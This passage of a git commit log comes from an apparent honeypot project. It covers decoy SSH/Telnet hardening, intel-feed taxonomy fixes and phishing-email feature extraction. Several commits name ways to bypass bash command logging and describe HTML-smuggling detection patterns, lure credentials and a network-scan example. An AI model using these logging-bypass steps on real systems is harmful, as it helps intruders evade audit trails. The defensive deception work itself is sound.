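from pathlib import Path


class ArtifactPathError(ValueError):
    """Raised when a requested artifact path is malformed or escapes the root."""


# Hypothetical component pattern; the real regex is not shown in the log.
_SAFE_COMPONENT = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def resolve_artifact_path(root, decky_id, service, stored_as) -> Path:
    for part in (decky_id, service, stored_as):
        if not _SAFE_COMPONENT.fullmatch(part):
            raise ArtifactPathError(f"invalid path component: {part!r}")
    root = Path(root).resolve()
    # resolve() follows symlinks, so a link pointing outside the root is caught.
    candidate = (root / decky_id / service / stored_as).resolve()
    if not candidate.is_relative_to(root):
        raise ArtifactPathError("path escapes the artifacts root")
    return candidate
```

A router can then catch `ArtifactPathError` and map it to an HTTP 400, while a worker can catch the same exception and skip the event.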
2026-05-02 20:02:47 -04:00
cdbb3d3571 fix(ssh,telnet): move PROMPT_COMMAND out of /root/.bashrc + pin readonly
ANTI flagged two regressions in the existing command-event capture:

1. **Tell**: PROMPT_COMMAND lived in /root/.bashrc, the FIRST file
   an attacker greps after landing root. The logger invocation
   sitting there is plain-text honeypot signage.
2. **Bypass**: even when missed, `export PROMPT_COMMAND=""` silently
   disables capture. ANTI personally bypasses this on engagements.

Reshape:

* Move the assignment to **/etc/environment** — read by pam_env at
  session open (sshd via /etc/pam.d/sshd, telnet via
  /etc/pam.d/login), before any shell rc file fires. Far less
  obvious than .bashrc; a casual `cat .bashrc` no longer surfaces
  the capture.
* Define the helper as a function `__bash_history_sync` in
  **/etc/bash.bashrc** (system-wide bashrc, sourced by every
  interactive bash). Function name reads as generic bash
  housekeeping; no DECNET branding in the symbol.
* Pin both the function and PROMPT_COMMAND **readonly** so
  `export PROMPT_COMMAND=""` fails with "readonly variable"
  instead of silently winning. Mitigation, not airtight —
  `bash --norc` still bypasses — but the passive `export`
  bypass is closed.

The actual `logger --rfc5424 --msgid command ... CMD ...` invocation
is preserved exactly; only its location and the readonly guard
change. R0001–R0030 (command-rule pack) consume the same syslog
shape as before.

Three new tests assert: the value lands in /etc/environment, the
function body lives in /etc/bash.bashrc, no PROMPT_COMMAND line
remains in /root/.bashrc, and `readonly PROMPT_COMMAND` /
`readonly -f __bash_history_sync` are both present. Mirror
assertions added on the Telnet Dockerfile via
test_config_schema.py.
2026-05-02 19:50:24 -04:00
3e9c4c29b9 feat(ssh,telnet): add non-root user account for privesc + enum lure
Real Linux deployments (especially Ubuntu cloud images) ship a non-
root admin user; honeypots that only accept root logins are a tell.
Add a second account on both SSH and Telnet decoys, configurable
via service_cfg keys `user` / `user_password`, defaulting to
`ubuntu` / `admin` so the lure is live on every fresh deploy.

* `decnet/services/{ssh,telnet}.py` — two new ServiceConfigFields
  (`user` string, `user_password` secret) and matching env vars
  (`SSH_USER` / `SSH_USER_PASSWORD`, mirror for telnet) propagated
  via the compose fragment.
* `decnet/templates/ssh/entrypoint.sh` — runtime `useradd -m -s
  /usr/libexec/login-session -G sudo "$SSH_USER"` so the new user
  inherits the same sessrec pty-recording shell as root and lands
  in the sudo group. Privesc attempts (`sudo`) flow through the
  existing sudo-log capture; network-enum from the user's shell
  rides the recorded transcript.
* `decnet/templates/telnet/entrypoint.sh` — same useradd pattern
  (no sudo group — busybox+login telnet image has no sudo
  package; privesc rides `su -` which itself flows through the
  existing PAM auth-helper at /etc/pam.d/login).
* New tests for default + custom user / password + independence
  from root password. Updated the schema-keys assertion to match
  the four-field shape.

The new account is ALSO the natural home for the body-aware
predicates that were previously gated on root-only sessions —
attackers who land on `ubuntu@host` and run network-recon /
privesc commands now generate the same structured TTP-rule
events as root sessions did, captured via the same auth-helper
+ sessrec + sudo-log pipes.
2026-05-02 19:48:03 -04:00
c675bd26cf docs(debt): mark DEBT-035 resolved; lift DEBT-047 filesystem-access blocker
DEBT-035 (artifacts written as the container uid, not the API's) is
resolved by the two preceding commits:
* 39a298f6 — persists DECNET-service api-user/api-group as names in
  decnet.ini for any future composer / worker that wants to resolve
  the local uid via pwd.getpwnam.
* b2733216 — creates /var/lib/decnet/artifacts at init time with mode
  0o2775 (setgid + group-write) owned by the DECNET-service
  user:group.

The setgid bit is the load-bearing fix: Linux mkdir(2) propagates a
parent's group AND its setgid bit to every new subdirectory. Docker
auto-creates the per-decoy / per-service subtree as bind-mounts fire,
so those subdirs come up with group=decnet and setgid set; container
file writes (default umask 0o022 → mode 0o644) inherit the decnet
group; the API process and the local TTP worker (both running as the
DECNET-service user, primary group decnet) read via group-read.

The original recommendation of compose `user:` injection turned out
infeasible for SSH and Telnet — PAM's setuid(2) during login
fundamentally cannot run from a non-root container. Setgid covers
both root-internal and unprivileged-internal templates uniformly
without requiring per-template carve-outs.

DEBT-047 (R0047 BEC disk-reach) was gated on DEBT-035 for filesystem
access. That blocker is lifted — `decnet ttp` running on agents as
the local DECNET-service user can now read .eml files written by
the SMTP decoy. The remaining DEBT-047 work is the master-only gate
flip in decnet/cli/gating.py and the EmailLifter disk-reach helper
itself (factor _resolve_artifact_path out of the artifacts API
endpoint into a shared module).

Soft-fail paths in api_get_transcript.py and api_get_artifact.py
stay as defence-in-depth — option 2 should make them never fire on
a healthy install but a misconfigured deploy must not 500 the API.
2026-05-02 19:40:12 -04:00
b27332169d feat(init): create /var/lib/decnet/artifacts with setgid + group-write
DEBT-035 step 2. Today the artifacts subtree is auto-created by
Docker as root when a decoy container's bind-mount fires for the
first time. The resulting permissions are root:root 0o755 — the API
process (running as the decnet user) hits PermissionError trying to
read transcripts written by the container, and the soft-fail 404
path gets exercised on every fresh deploy.

Add `/var/lib/decnet/artifacts` to init's dirs list with mode 0o2775:

* 0o2000 — setgid bit. New files inherit the directory's group
  (decnet), regardless of which uid created them. This is the load-
  bearing bit for cross-container reads.
* 0o0775 — owner+group rwx, world rx. Group-write lets the API
  process and the local TTP worker read each other's outputs
  without a manual chown.

`_ensure_dir` already respects the full mode word via `os.chmod`,
so no helper change is needed.

Test asserts the resulting directory carries exactly 0o2775 after
a fresh `decnet init --prefix`. Defence-in-depth: this works even
if the per-decoy compose `user:` directive (next commit) misses a
template — files still land in the decnet group.
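
A minimal sketch of the mode arithmetic above. `ensure_dir` and
`describe_mode` are hypothetical stand-ins for illustration; the real
`_ensure_dir` helper is not shown in this commit message.

```python
import os
import stat
import tempfile

ARTIFACTS_MODE = 0o2775  # setgid (0o2000) + rwxrwxr-x (0o0775)


def ensure_dir(path: str, mode: int) -> None:
    """Hypothetical stand-in for init's directory helper."""
    os.makedirs(path, exist_ok=True)
    # makedirs applies the umask to the mode it is given, so the full
    # mode word is set explicitly afterwards.
    os.chmod(path, mode)


def describe_mode(mode: int) -> dict:
    """Split a mode word into the pieces discussed in the message."""
    return {
        "setgid": bool(mode & stat.S_ISGID),
        "perms": oct(mode & 0o777),
        "group_write": bool(mode & stat.S_IWGRP),
        "world_write": bool(mode & stat.S_IWOTH),
    }


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "artifacts")
        ensure_dir(target, ARTIFACTS_MODE)
        print(describe_mode(stat.S_IMODE(os.stat(target).st_mode)))
```

On Linux an unprivileged chmod can silently drop the setgid bit when
the caller is not a member of the directory's group, which is one
reason a test that checks the resulting mode is worth having.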
2026-05-02 19:35:20 -04:00
39a298f685 feat(init): persist DECNET-service api-user/api-group to decnet.ini
DEBT-035 step 1. The composer needs to know which uid/gid to inject
into each compose fragment's `user:` directive at deploy time. Today
the resolved `--user` / `--group` values reach systemd unit
rendering (init.py:349–354) but are not persisted anywhere the
composer can read them.

Persist as **names** (not numeric ids) under `[decnet] api-user` /
`api-group` in the rendered decnet.ini placeholder. Resolution to
uid/gid happens at deploy time on whichever host runs the deploy,
via `pwd.getpwnam(...)` / `grp.getgrnam(...)` — so the same user
name can have different uids on master vs agents (heterogeneous
/etc/passwd) without breaking artifact ownership. The existing
config_ini auto-translates kebab→DECNET_API_USER / DECNET_API_GROUP
at load time; no domain-map changes needed.

Two new tests: one asserting the rendered ini carries the
`api-user` / `api-group` keys for the values passed to `--user` /
`--group`; one round-tripping through `load_ini_config` to confirm
the env vars land in `os.environ` for the composer to pick up.
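
A rough sketch of the name-based flow, under stated assumptions: the
function names below are hypothetical, and the kebab-to-env rule is
inferred only from the `api-user` -> `DECNET_API_USER` example above.

```python
import configparser
import grp
import pwd


def kebab_to_env(key: str, prefix: str = "DECNET_") -> str:
    """Assumed translation rule: api-user -> DECNET_API_USER."""
    return prefix + key.replace("-", "_").upper()


def read_service_identity(ini_text: str) -> tuple[str, str]:
    """Read the persisted names from the [decnet] section."""
    parser = configparser.ConfigParser()
    parser.read_string(ini_text)
    section = parser["decnet"]
    return section["api-user"], section["api-group"]


def resolve_ids(user: str, group: str) -> tuple[int, int]:
    """Resolve names on the local host at deploy time.

    Raises KeyError when either name is unknown locally, so the same
    name may map to different numeric ids on master and agents.
    """
    return pwd.getpwnam(user).pw_uid, grp.getgrnam(group).gr_gid
```

Keeping the lookup in its own function means the numeric ids are
never written to the ini, only computed where the deploy runs.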
2026-05-02 19:33:53 -04:00
b3ea3fa925 docs(debt): merge rogue root DEBT.md into the canonical development/DEBT.md
A previous agent (and several of my own commits) wrote to a top-level
DEBT.md without seeing the existing development/DEBT.md — the
canonical register since DEBT-001. The result was two parallel files,
inconsistent numbering schemes, and references that resolved to the
wrong place.

Migrate the six entries that landed in the rogue file into the
canonical register as DEBT-044 through DEBT-049, preserving their
status (resolved / partial / open) and cross-references. The
TTP_TAGGING.md references to "DEBT.md" already resolve to
development/DEBT.md by virtue of being in the same directory; only
the comment in decnet/ttp/impl/intel_lifter.py needed disambiguation
to "development/DEBT.md DEBT-048".

* DEBT-044 — `attacker.email.received` producer wiring (RESOLVED 2026-05-02)
* DEBT-045 — EmailLifter heavyweight feature extraction (PARTIAL PAID 2026-05-02)
* DEBT-046 — EmailLifter mal-hash feed integration (open)
* DEBT-047 — EmailLifter R0047 BEC unblock (open, gated on DEBT-035)
* DEBT-048 — TTP intel provider mapping review (recurring quarterly)
* DEBT-049 — TTP Sigma adapter — post-v1 (open)

Summary table extended; "Remaining open" line updated; root file
removed. The DEBT-047 entry now explicitly cross-references DEBT-035
as the gating dependency for the R0047 BEC unblock.
2026-05-02 19:17:20 -04:00
17367d0a69 docs(debt,ttp): retire shipped lanes; file mal-hash-feed and R0047-disk-reach entries
Mark the EmailLifter heavyweight follow-up as PARTIAL PAID — R0042 /
R0046 (macro / password / smuggling lanes) / R0048 fire end-to-end
after commits 291b78c1 (decky extractors) and the ingester producer
projection that follows.

Two narrower DEBT entries replace the lanes that remain gated:

* "EmailLifter mal-hash feed integration" — R0046's mal_hash_match
  lane needs a curated bad-hash feed (MalwareBazaar SHA-256 dump as
  the v0 candidate, mirroring the FeodoProvider bulk-feed pattern at
  decnet/intel/feodo.py). Feed integration, not extraction. Lifter
  predicate already reads `payload.get("mal_hash_match")` — silent
  today only because the field is absent.
* "EmailLifter R0047 BEC — unblock when artifact disk-reach lands"
  cross-references the agent UID/GID DEBT entry that blocks
  `decnet ttp` from reading artifacts written by deckies on the
  same host. Disk-reach is the intended solution; raw body_text on
  the bus is rejected because the bus transport is abstracted (the
  UNIX-socket implementation may swap to networked at any time, and
  privacy decisions must hold regardless of transport).

Append to TTP_TAGGING.md §"Producer wiring": the email.received
producer pointer (was "none — DEBT"), the full per-message payload
shape with the new heavyweight fields, and an explanatory block on
why the bus is body-text-free + how R0047 / R0048 each handle their
body dependency (R0048 via the precomputed scalar; R0047 deferred).
2026-05-02 19:12:30 -04:00
c714941069 feat(bus): project EmailLifter heavyweight fields onto email.received
The decky's Layer-2 extension (commit 291b78c1) emits body_simhash /
body_base64_bytes / html_smuggling on the message_stored log and adds
macro_indicator / encrypted booleans to each attachments_json
manifest entry. Lift them all onto the email.received bus payload:

* body_simhash — passes through as-is (16 hex chars or "")
* body_base64_bytes — coerced to int (0 on absent / malformed)
* attachment_macros / attachment_password_protected — OR-reduced
  across the per-attachment manifest booleans; matches R0046's
  matched_trigger semantics where a single positive lane fires the
  rule
* html_smuggling — coerced bool from the decky's 0/1 int

Pre-Layer-2 message_stored events (older deckies, malformed log
rows) project to safe defaults: empty simhash, zero base64-bytes,
all booleans False — the EmailLifter then stays silent, never
fires a false positive on missing data.

R0042 (mass-phish) / R0046 macro / R0046 password / R0046 smuggling
/ R0048 (encoded payload) all fire end-to-end after this commit.
R0046 mal_hash_match and R0047 BEC remain deferred per their
respective DEBT entries (filed in the next commit).
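
The coercion rules above can be sketched roughly as follows. The
function name `project_heavyweight` and the flat `fields` dict are
assumptions for illustration; only the field names and the safe
defaults come from this message.

```python
import json
from typing import Any


def _to_int(value: Any) -> int:
    """Coerce to int, falling back to 0 on absent or malformed input."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return 0


def project_heavyweight(fields: dict[str, Any]) -> dict[str, Any]:
    """Project message_stored fields onto the bus payload (sketch)."""
    try:
        manifest = json.loads(fields.get("attachments_json") or "[]")
    except (TypeError, ValueError):
        manifest = []
    if not isinstance(manifest, list):
        manifest = []
    entries = [e for e in manifest if isinstance(e, dict)]
    return {
        "body_simhash": str(fields.get("body_simhash") or ""),
        "body_base64_bytes": _to_int(fields.get("body_base64_bytes")),
        # OR-reduce: one positive attachment is enough to set the flag.
        "attachment_macros": any(bool(e.get("macro_indicator")) for e in entries),
        "attachment_password_protected": any(bool(e.get("encrypted")) for e in entries),
        "html_smuggling": bool(_to_int(fields.get("html_smuggling"))),
    }
```

An empty input dict yields the all-defaults payload, which is the
pre-Layer-2 case described above.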
2026-05-02 19:10:30 -04:00
291b78c1d0 feat(smtp): extract body_simhash + base64-bytes + html-smuggling + per-attachment macro/encrypted
Heavyweight Layer-2 extractors land alongside the cheap projections
shipped in commit e9324aca, so the EmailLifter R0042 / R0046 (macros
/ password / smuggling lanes) / R0048 fire from the bus payload
without the lifter having to reach back to disk.

Extractors:
* body_simhash — inlined 64-bit Charikar simhash (md5-keyed,
  frequency-weighted) over word tokens of the union of text/* body
  parts. Inlined rather than pulling the `simhash` PyPI dep, which
  transitively brings numpy ~50 MB into a slim decky container; the
  algorithm is ~15 lines and identical in extraction quality.
* body_base64_bytes — largest decoded base64 chunk's byte count,
  scanning text body parts with the same `_BASE64_RE` the lifter's
  `_p_encoded_payload` fallback uses. R0048 fires from this scalar
  alone; the lifter's body_text fallback becomes dead in normal
  operation.
* attachment_macro_indicator — stdlib zipfile sniff for
  `vbaProject.bin` inside OOXML containers. Catches modern .docm /
  .xlsm / .pptm and macro-injected .docx; legacy .xls (CFBF) is a
  follow-up.
* attachment_encrypted — flag_bits & 0x01 on any ZIP / OOXML entry's
  central directory; magic-byte match for 7z / RAR / CFBF (encrypted
  Office wrap).
* html_smuggling — structural lxml parse first: fires when an `<a
  download>` element coexists with a `<script>` referencing
  `Blob` / `Uint8Array` / `URL.createObjectURL`. Regex pair-check
  fallback on lxml parse failure (real-world phish HTML is often
  malformed). Cuts the FP rate that pure-regex would produce on
  legitimate "click to download" links.

Add `python3-lxml` (~5 MB Debian package, C-extension, no transitive
Python deps) to the SMTP decky's Dockerfile. simhash stays inline.
Per the dependency rule: lxml earns its weight by cutting R0046's
OR-combined FP rate; a heavier macro-detection lib (oletools ~5 MB
pure-python with msoffcrypto) would not measurably improve the
boolean signal we need, so stdlib stays for that lane.
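
For readers unfamiliar with the two stdlib-only lanes, here is a
hedged sketch of an md5-keyed, frequency-weighted 64-bit simhash and
a zipfile sniff. Function names, the `\w+` tokenizer and the choice
of the first 8 digest bytes are assumptions; the shipped extractor
may differ in all of them.

```python
import hashlib
import io
import re
import zipfile
from collections import Counter

_TOKEN_RE = re.compile(r"\w+")


def body_simhash(text: str) -> str:
    """Charikar-style simhash; 16 hex chars, or "" for an empty body."""
    counts = Counter(_TOKEN_RE.findall(text.lower()))
    if not counts:
        return ""
    weights = [0] * 64
    for token, freq in counts.items():
        digest = hashlib.md5(token.encode("utf-8"), usedforsecurity=False).digest()
        h = int.from_bytes(digest[:8], "big")
        for bit in range(64):
            # Each token votes +freq or -freq on every bit position.
            weights[bit] += freq if (h >> bit) & 1 else -freq
    fingerprint = sum(1 << bit for bit in range(64) if weights[bit] > 0)
    return f"{fingerprint:016x}"


def has_vba_project(data: bytes) -> bool:
    """True when a ZIP/OOXML container holds a vbaProject.bin member."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(n.lower().endswith("vbaproject.bin") for n in archive.namelist())
    except zipfile.BadZipFile:
        return False


def zip_has_encrypted_entry(data: bytes) -> bool:
    """True when any entry has general-purpose flag bit 0 set."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(info.flag_bits & 0x01 for info in archive.infolist())
    except zipfile.BadZipFile:
        return False
```

Near-duplicate bodies should land within a small Hamming distance of
each other; the distance threshold itself is a rule-side decision and
is not sketched here.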
2026-05-02 19:08:37 -04:00
fb85762703 feat(bus): publish email.received from ingester after SMTP artifact persist
Wires the EmailLifter (R0041–R0048) producer that DEBT.md item #3
deferred. After the existing add_bounty() call in _extract_bounty
(line 615), call _publish_email_received() which:

* resolves the attacker_uuid via repo.get_attacker_uuid_by_ip; drops
  the publish if unresolved (the TTP worker can't anchor orphan
  events)
* projects the message_stored fields onto the EmailLifter wire
  contract: from_domain / mail_from_domain / return_path_domain
  parsed via _domain_of, rcpt_count + rcpt_domains via
  _rcpt_projection, attachment_sha256s + attachment_extensions
  derived from the existing attachments_json manifest, urls from
  urls_json, dkim_signed/spf_pass coerced from 0/1 ints to bool
* mirrors _publish_probe_pending's bus-per-call pattern and
  swallows all exceptions (the bus is the notification layer, not
  the source of truth)

Fires for both relay and non-relay SMTP services. R0041 / R0043 /
R0044 / R0045 are now live end-to-end; R0046 partial (extension
lane). Heavyweight predicates (R0042 simhash, R0046-deep, R0047 /
R0048 body_text) stay deferred per the EmailLifter heavyweight
DEBT entry.
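
A small sketch of the domain and recipient projections, assuming
stdlib address parsing. `domain_of` and `rcpt_projection` are
hypothetical counterparts of `_domain_of` / `_rcpt_projection`, whose
actual bodies are not shown in this message.

```python
from email.utils import parseaddr


def domain_of(address: str) -> str:
    """Lower-cased domain of an address or header value, "" if none."""
    _, addr = parseaddr(address or "")
    if "@" not in addr:
        return ""
    return addr.rsplit("@", 1)[1].strip().lower()


def rcpt_projection(rcpts: list[str]) -> tuple[int, list[str]]:
    """Return (rcpt_count, distinct recipient domains, first-seen order)."""
    domains: list[str] = []
    for rcpt in rcpts:
        domain = domain_of(rcpt)
        if domain and domain not in domains:
            domains.append(domain)
    return len(rcpts), domains
```

Only domains are projected in this sketch; local parts stay out of
the result, which keeps the projection cheap.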
2026-05-02 18:39:13 -04:00
e9324acac7 feat(smtp): emit X-Mailer / Return-Path / dkim+spf / URLs on message_stored
The EmailLifter (R0041–R0048) keys on header-derived signals that the
v0 _summarize_message did not extract. Add cheap Layer 2 projections
inside the existing single-pass parse:

* return_path / x_mailer — direct header reads, decoded RFC 2047
* dkim_signed / spf_pass — booleans derived from any
  Authentication-Results header (multiple lines tolerated; positive
  verdict on any line wins)
* urls — http(s) URLs lifted from text/* body parts via a tight
  regex, deduplicated first-seen-wins, capped at 64 in the wire
  payload to bound the syslog SD value

Heavyweight extraction (body simhash, office-macro detection,
HTML-smuggling, password-protected archives, mal-hash-match,
body_text projection) stays deferred per the EmailLifter heavyweight
DEBT entry — those rules need privacy / extractor decisions before
they ship.
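
The cheap projections might look roughly like the sketch below. The
regexes, and treating `dkim=pass` / `spf=pass` as the positive
verdict, are assumptions; only the any-line-wins rule, the
first-seen dedup and the cap of 64 come from this message.

```python
import re

_URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
_DKIM_PASS_RE = re.compile(r"\bdkim\s*=\s*pass\b", re.IGNORECASE)
_SPF_PASS_RE = re.compile(r"\bspf\s*=\s*pass\b", re.IGNORECASE)
MAX_URLS = 64


def auth_verdicts(auth_results_headers: list[str]) -> tuple[bool, bool]:
    """(dkim_signed, spf_pass): a positive verdict on any line wins."""
    dkim = any(_DKIM_PASS_RE.search(h) for h in auth_results_headers)
    spf = any(_SPF_PASS_RE.search(h) for h in auth_results_headers)
    return dkim, spf


def extract_urls(text: str, cap: int = MAX_URLS) -> list[str]:
    """http(s) URLs, deduplicated first-seen-wins, capped at `cap`."""
    seen: dict[str, None] = {}  # dicts preserve insertion order
    for match in _URL_RE.finditer(text):
        seen.setdefault(match.group(0), None)
    return list(seen)[:cap]
```

Capping after deduplication means repeated links do not crowd out
distinct ones within the 64-entry budget.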
2026-05-02 18:37:11 -04:00
2ce150a53e docs(debt): mark email.received producer as paid; file heavyweight follow-up
The 2026-05-02 paydown wires the producer at ingester.py after
add_bounty(), with the cheap projections (domains, rcpt_count,
attachment_count, x_mailer, dkim/spf, attachment shas + extensions,
URLs). R0041 / R0043 / R0044 / R0045 fire end-to-end after this PR;
R0046 partial.

The remaining lanes (R0042 body_simhash, R0046 macro / smuggling /
password / mal_hash, R0047 / R0048 body_text projection) are filed
as a new entry "EmailLifter heavyweight feature extraction" with the
field map and the privacy-vs-completeness fork on body_text called
out for the next maintainer to pick a side.
2026-05-02 18:24:51 -04:00
9a7d116351 docs(ttp): sync A.10 + rewrite §9 drift runbook + DEBT.md markers
Appendix A.10 corrected to match the post-2026-05-02-audit reality:
AbuseIPDB cat 7/13/16/17 land on their canonical AbuseIPDB names
(Phishing / VPN IP / SQL Injection / Spoofing); cats 4 and 10 carry
explicit "drop" annotations so the next reviewer sees the intent
rather than guessing. ThreatFox table re-keys on `threat_type` (the
canonical taxonomy field) and adds the `payload` and `cc_skimming`
rows. GreyNoise table promotes bare-malicious to a half-multiplier
emission of T1071.

§"Hard parts §9 Intel provider drift" replaces the prose handwave
with a runnable check: provider URLs, the ThreatFox curl invocation
that needs DECNET_THREATFOX_API_KEY, the rule_version + emits +
attack_catalog co-evolution rules, and the full chain of files to
exercise. Adds a "Ship-time audit log" subsection so future quarterly
runs have a known-good baseline to diff against.

DEBT.md item #1 records LAST_REVIEWED: 2026-05-02 / NEXT_REVIEW:
2026-08-02 and points at §9 for the runbook. DEBT.md item #3 (the
attacker.email.received producer) flags its gating premise as
potentially stale — ANTI noted SMTP honeypots already persist
received messages, contradicting the "no source row" claim that
deferred the wiring.
2026-05-02 18:09:20 -04:00
f8dee596e5 fix(ttp): expand R0054/R0055/R0057 emits + LAST_REVIEWED markers
The IntelLifter's _emit_filtered fans out only the rule.emits entries
whose technique_id appears in the predicate's decision set. v1's emits
lists were narrow supersets of the common case, silently dropping the
rest of the predicate's possible emissions:

  R0054 dropped: T1046 (cat 14), T1078 (cat 20), T1090 (cats 9/13),
                 T1496 (cat 11), T1595 (cats 14/19)
  R0055 dropped: T1090 (tor_exit_node), T1110 (ssh_bruteforcer),
                 T1588 (the second emit of every C2-framework tag)
  R0057 dropped: T1105 (payload_delivery, download_url)

Bump rule_version 1->2 on R0054/R0055/R0057, expand emits to cover
every technique the predicate produces. R0056 (Feodo) and R0058
(aggregate bump) carry no enum and stay at v1.

All five YAMLs gain `last_reviewed: "2026-05-02"` and
`next_review: "2026-08-02"` markers; the rule YAML is now the
canonical record of when the mapping was last reconciled against
upstream, with DEBT.md as the calendar reminder.
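
To make the silent-drop failure mode concrete, a sketch of the
filtering step. The `Emit` type and both function names are
hypothetical, and the v1 emits list used in the usage note is an
invented example, not the real R0057 YAML.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Emit:
    technique_id: str
    confidence: float


def emit_filtered(rule_emits: list[Emit], decided: set[str]) -> list[Emit]:
    """Keep only the declared emits the predicate actually decided on."""
    return [e for e in rule_emits if e.technique_id in decided]


def dropped_by_emits(rule_emits: list[Emit], decided: set[str]) -> set[str]:
    """Technique ids the predicate produced but the rule never declared."""
    return decided - {e.technique_id for e in rule_emits}
```

With a hypothetical v1 list of `[Emit("T1071", 0.6)]` and a predicate
decision of `{"T1071", "T1105"}`, `dropped_by_emits` returns
`{"T1105"}`: the predicate fired, but nothing was declared to carry
it. A check like this could run in a test over every rule.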
2026-05-02 18:09:03 -04:00
75ff0ede1f fix(ttp): correct intel_lifter mappings + repoint ThreatFox to threat_type
Three bug classes uncovered by the 2026-05-02 ship-time audit:

* AbuseIPDB code/name mismatch in v1: cat 10 was treated as DDoS (it's
  Web Spam — DDoS is cat 4, intentionally unmapped per A.10) and cat 17
  as VPN IP (it's Spoofing — VPN IP is cat 13). Both typos mirrored in
  code AND the design doc Appendix A.10. Code now matches the AbuseIPDB
  taxonomy exactly; cat 17 retargets to T1566 (email-spoofing as a
  phishing precursor), and cats 7 (Phishing) and 16 (SQL Injection)
  pick up T1566 / T1190 emissions that v1 didn't cover.

* ThreatFox dispatch keyed on `ioc_type` in v1, but `ioc_type` is the
  indicator format (url / domain / hash variants) and carries no ATT&CK
  signal. The canonical taxonomy field per ThreatFox's API is
  `threat_type` (botnet_cc / payload_delivery / payload / cc_skimming).
  Repoint dispatch through the new `threatfox_threat_types` payload
  field; `ioc_type` rides as evidence only. Also adds the missing
  cc_skimming -> T1056 (Input Capture) mapping and registers T1056 in
  attack_catalog.py.

* GreyNoise bare-malicious lane: a `classification == "malicious"` row
  with no recognised tag used to emit nothing. Now lights T1071 at a
  half multiplier, suppressed when a tag already fires T1071 to avoid
  double-stamping at conflicting confidence levels.
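
One possible reading of the GreyNoise bare-malicious lane, as a
sketch only. The tag map, the `example_c2_tag` placeholder and the
0.8 base confidence are invented for illustration; this message
states only the half multiplier and the suppression rule.

```python
from typing import Iterable

# Illustrative map; the real tag taxonomy lives in the lifter.
HYPOTHETICAL_TAG_TECHNIQUES: dict[str, list[str]] = {
    "tor_exit_node": ["T1090"],
    "ssh_bruteforcer": ["T1110"],
    "example_c2_tag": ["T1071", "T1588"],  # placeholder tag name
}
BARE_MALICIOUS_MULTIPLIER = 0.5


def greynoise_techniques(
    classification: str,
    tags: Iterable[str],
    base_confidence: float = 0.8,
) -> dict[str, float]:
    """Map a GreyNoise row to {technique_id: confidence}."""
    out: dict[str, float] = {}
    for tag in tags:
        for technique_id in HYPOTHETICAL_TAG_TECHNIQUES.get(tag, []):
            out[technique_id] = max(out.get(technique_id, 0.0), base_confidence)
    # Bare-malicious lane: only when no tag has already stamped T1071.
    if classification == "malicious" and "T1071" not in out:
        out["T1071"] = base_confidence * BARE_MALICIOUS_MULTIPLIER
    return out
```

Checking `"T1071" not in out` after the tag loop is what prevents the
same technique from being stamped at two confidence levels.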
2026-05-02 18:08:48 -04:00
a31ad82880 feat(intel): project per-provider taxonomy into attacker.intel.enriched payload
The TTP worker forwards the bus payload verbatim to the IntelLifter as
TaggerEvent.payload. The pre-audit publish payload only carried
{attacker_uuid, attacker_ip, aggregate_verdict, providers}, so even with
the new AttackerIntel taxonomy columns populated the lifter still saw
nothing. Lift the relevant fields (categories / tags / threat_types /
malware family / score / classification) into the bus event and decode
JSON-string list columns back to native lists at the boundary.
2026-05-02 18:08:29 -04:00
999d3494b4 feat(intel): persist per-provider taxonomy on AttackerIntel for TTP dispatch
The 2026-05-02 ship-time audit of the R0054-R0058 intel rule pack found
that AbuseIPDB / GreyNoise / ThreatFox stored only the aggregate verdict
(score / classification / listed-bool) plus the raw response blob. The
TTP IntelLifter expects per-provider taxonomy fields (categories, tags,
threat_types) that were never populated, so R0054 / R0055 / R0057
emitted zero tags in production despite passing unit tests.

Add typed columns: abuseipdb_categories, greynoise_tags, greynoise_name,
feodo_malware_family, threatfox_threat_types, threatfox_ioc_types,
threatfox_malware_families. Each provider now parses the relevant
taxonomy out of the upstream response and writes it through
column_updates. JSON-list columns ride as TEXT with default "[]" to
keep the SQLite/MySQL backend split honest, deserialised back to native
lists by the repo on read.
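
The TEXT-column round trip can be sketched as below; both helper
names are hypothetical and the real repo code may handle malformed
values differently.

```python
import json
from typing import Any


def encode_list_column(values: list[str]) -> str:
    """Serialise a list for a TEXT column; the empty list is "[]"."""
    return json.dumps(list(values))


def decode_list_column(raw: Any) -> list:
    """Decode a TEXT column back to a list, tolerating bad input."""
    if isinstance(raw, list):
        return raw
    if not raw:
        return []
    try:
        value = json.loads(raw)
    except (TypeError, ValueError):
        return []
    return value if isinstance(value, list) else []
```

Falling back to an empty list on malformed input keeps the lifter
silent rather than raising mid-dispatch.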
2026-05-02 18:07:57 -04:00
d1c4a48963 feat(ttp): split bash CMD evidence into structured uid/user/src/pwd/cmd rows
The inspector was dumping the whole `CMD uid=0 user=root src=… pwd=…
cmd=nmap -p- 192.168.1.0/24` syslog body into a single ``command_text``
blob. ANTI: "I'd like to separate the fields." Done — three layers
work together:

1. Collector session aggregator: new `_parse_cmd_msg` splits the bash
   PROMPT_COMMAND msg into `{uid, user, src, pwd, command}`. The
   session-ended envelope's per-command dict now carries the
   structured fields, with `command_text` set to just the cmd= value
   (preserving embedded whitespace — `nmap -p- 1.2.3.0/24` etc.).

2. Rule engine: per-source_kind auxiliary evidence list
   (`_AUX_EVIDENCE_FIELDS`). For `command` events the engine
   automatically promotes uid/user/src/pwd into the persisted
   `evidence` dict on top of the rule's explicit `evidence_fields`.
   Engine-controlled, not per-rule — adding a new aux field is one
   line here, not a 30-rule YAML sweep, and rule authors can't
   accidentally drop it.

3. TTPInspector frontend: evidence renders as a structured
   `kvs` grid (UID / USER / SRC / PWD / CMD rows) instead of
   pretty-printed JSON. Primary-order list keeps shell fields at
   the top; everything else falls below alphabetically so unfamiliar
   evidence shapes still surface predictably.

Tests:
- session_aggregator pins the structured-fields emit (uid/user/src/
  pwd/command_text without "CMD" prefix, embedded whitespace
  preserved).
- rule_engine_tagger pins the aux-field auto-promotion + the
  no-`None`-leakage path when payload doesn't carry an aux key.
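
A sketch of layers 1 and 2 under stated assumptions: the regex, the
two function names and the dict shapes are guesses for illustration,
based only on the `CMD uid=… cmd=…` layout quoted above.

```python
import re
from typing import Any, Optional

_CMD_RE = re.compile(
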